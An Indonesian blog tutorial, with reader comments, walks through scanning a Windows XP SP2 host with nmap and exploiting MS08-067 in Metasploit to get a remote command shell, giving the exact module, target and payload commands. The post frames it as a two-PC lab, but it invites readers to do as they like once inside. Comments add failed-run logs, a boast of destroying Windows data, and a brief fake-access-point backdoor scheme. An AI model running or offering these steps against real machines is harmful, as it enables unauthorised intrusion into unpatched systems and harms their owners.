Skip navigation

Ternyata hacking itu bisa jadi gampang banget kalau kita menggunakan tool yang bagus seperti Metasploit dan menemukan target yang rentan untuk dijadikan sasaran hacking. Cukup denga menginstall Metasploit Framework, mengetikkan kata kunci “metasploit tutorial” di Google, mencari target menggunakan nmap, menjalankan exploit di Metasploit, maka kita sudah dapat menguasai sistem operasi target (kalau beruntung😉 ). Kalau dihitung, kita hanya mengetikkan beberapa perintah saja dari terminal untuk menguasai target (tentu saja targetnya harus vulnerable). Nah, di artikel ini saya akan mencoba menuliskan secara singkat bagaimana menggunakan Metasploit untuk mengekploitasi bug di service NetBIOS Windows XP SP2 . Kalau merasa masih n00b seperti saya, lanjutkan membaca tapi kalau sudah terbiasa dengan msf silakan ambil langkah seribu.

Skenario dan Kebutuhan Software
Di artikel ini, saya menggunakan dua PC untuk melakukan simulasi hacking kecil-kecilan. Sistem operasi yang digunakan hacker (biar keren jeh :D) adalah Ubuntu 10.04, sedangkan target menggunakan Windows XP SP2. Kedua PC ini berada di jaringan dengan subnet yang sama, yaitu 10.10.10.128/25 di mana si hacker menggunakan IP 10.10.10.232/25 dan IP target 10.10.10.251/25. Di Ubuntu yang digunakan si hacker sudah terinstall nmap dan msf aka Metasploit Framework versi 3.4.2-dev. nmap dapat diinstall dari repo menggunakan package manager milik Ubuntu, sedangkan msf harus diinstall secara manual menggunakan petunjuk di sini.

Scanning Target

Walaupun sebenarnya kita sudah tahu bahwa sistem operasi target adalah Windows XP SP2 yang menjalankan service NetBIOS, namun dalam skenario ini kita akan berpura-pura tidak tahu. Oleh karena itu kita akan melakukan scanning menggunakan nmap untuk melihat apakah target bisa dieksploitasi. Dari PC hacker yang menggunakan Ubuntu Lucid Lynx, buka aplikasi terminal lalu jalankan nmap dengan mengetik:

nmap -A -T4 10.10.10.251

Kalau hasilnya lebih kurang seperti gambar di bawah (ada port 445 yang open), maka kita dapat mencoba mengekploitasi target menggunakan msf.

Hasil scanning nmap

Exploit The Target

Kita boleh tersenyum karena target kelihatannya vulnerable. Sekarang waktunya menjalankan Metasploit, kembali ke terminal:

msfconsole

Di awal, kita akan melihat tampilan seperti ini

Console milik metasploit

Dari prompt tersebutlah kita akan menjalankan perintah-perintah Metasploit untuk mengekploitasi target. Untuk skenario ini, jalankan perintah:

use windows/smb/ms08_067_netapi
set RHOST 10.10.10.251
set PAYLOAD generic/shell_bind_tcp

Memulai eksploitasi

Perintah pertama digunakan untuk memilih bug yang akan kita ekploitasi, perintah kedua digunakan untuk menentukan IP dari target, dan perintah ketiga digunakan untuk memilih payload (payload itu merupakan aksi yang akan dijalankan jika bug berhasil dieksploitasi, dalam skenario ini kita meminta shell dari target aka command prompt).

Lalu jalankan exploit:

exploit

Jika berhasil tampilannya seperti ini:

Ekploitasi berhasil

Perhatikan ciri-ciri dari command prompt sistem operasi Windows, artinya kita sudah masuk di sistem target. Selanjutnya? Terserah anda.

Segampang itukah? Saya juga kurang mengerti karena saya masih kurang pengalaman di bidang ini, bagaimana menurut anda?

33 Comments

  1. mantap gan, besok ajarin ya @kontrakan….
    itukan ngejebol si jendela X(a)P(ek), kalo si Tux gmana?kalo bs posting jg tutorialnya…

  2. kekeek… koq seperti pepatah “pucuk di cinta, ulam pun tiba yah..”

    tadi abis baca jm sore tadi.. terus ni iseng scan network koq lemot.. ternyata server na wedus..wakakakakk

    :ngakak

    • Wekekekekeke….
      Trus diapain tuh server??

  3. Misi-misi gini aku tes tutornya kan di linux mint dari step awal smpai udah maw slesai gak ada masalah cma pas udah di tahap akhir .pas ngetik exploit.gni tampilanya
    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 2 – lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability…
    [*] Exploit completed, but no session was created.
    Mohon di luruskan😦

  4. yang dsni yah mas set PAYLOAD generic/shell_bind_tcp
    di maklumi yah kalo banyak nanya coz masih pemula..mest bnyk blajar..

    • Yuut, tapi saya agak lupa nama lengkap payload untuk yg meterpreter, coba aja pake comman show payload

      Nyantai aja, saya juga masih belajar kok..

  5. woot kk rotua sekarang tambah kereng udah jadi hecker rupanya :D…

    • Heker apanya oom, lha itu cuma nyoba2 aja kok…

  6. coba ah…awas lo wedus….

  7. weh keren,
    mudah banget dong jadi heker😀

    • Lha ini aku juga bingung, ini termasuk heker tidak ya?? (thinking)

  8. by jabon

    wah keren caranya ngikut ah

  9. kgk semua windows Xp bisa segampang ini bisa kebobol , tergantung dari versi updateanx dan exploit ni termasuk dah lama ,,, jadi mendingan di update terus exploit2 msf supaya dpet exploit yg update to date jga
    mending bkin backdoor pke msf .. pernah kgk kedeteksi sbg malware di antivirus mana pun..
    cara yg ampuh
    1. bkin access point palsu
    2. pas target masuk ke AP palsu tsb dan mulai buka browser wat browsing
    3. blawnnnnn langsung kena tuh backdoor secara gk langsung..
    dan ni dah tested di win 7 ..

    • Ya kang, lha ini namanya juga pemula…

    • boleh ikut nanya kang?

      backdor yang dipake apa ya? netcat atau meterpreter atau yang lainnya?

      trims🙂

      • Di sini belum sampe masang backdoor segala kang..

  10. mantap bang infonya,,,

    kunjungi blog saya juga mas,,,

  11. mwkakakakka….windows pada hancur semua datanya…mwkakakkakakak. thanks lae……

  12. Lammer’s here:

    1. Gimana caranya untuk temukan exploit nya Bang ?
    2. Ciri-ciri target yang vulnerable, kayak gimana bang ?
    :mrgreen:

  13. wah, kalo session a g da gimana ya mas???
    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 2 – lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability…
    [*] Exploit completed, but no session was created.

    mohon bantuannya.

  14. msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 0 / 1 – lang:English
    [*] Selected Target: Windows XP SP0/SP1 Universal
    [-] Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
    [*] Exploit completed, but no session was created.

    bang kalo masalahnya seperti ini gimana ? tolong dong solusinya…

  15. DAbrusssssss!!!!
    hasil COpas

  16. Ga mungkin bisa!!!!
    wong iki ea oleh nyontek

  17. Brooo ini sudah versi lama mas, kalau sudah pactnya di update silhakan di coba kembali dengan cara yang sama.
    apakah dengan mudahnya, semoga wawasan kita selalu bertambah.

    • Tapi saya yakin di luar sana masih banyak yg vulnerable kok, apalagi kebanyakan Windows di Inonesia itu bajakan.

  18. ijin nyobain om….

  19. kira-kira aman ta bang kalau di praktekan di UTM? hehehe😀

  20. aq kirim kan metasploit dong..please aq pingin nyoba tp gag punya uang bwt download…kirim kan ke email aq ya please teman. kevin.tears@yahoo.co.id


One Trackback/Pingback

  1. […] 2010 rotyyu Tinggalkan komentar Go to comments Masalah ini muncul setelah kemarin gagal update Metasploit di Ubuntu 10.04 64 bit karena koneksi kampus yang putus-nyambung putus-nyambung lagi kayak lagunnya […]

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: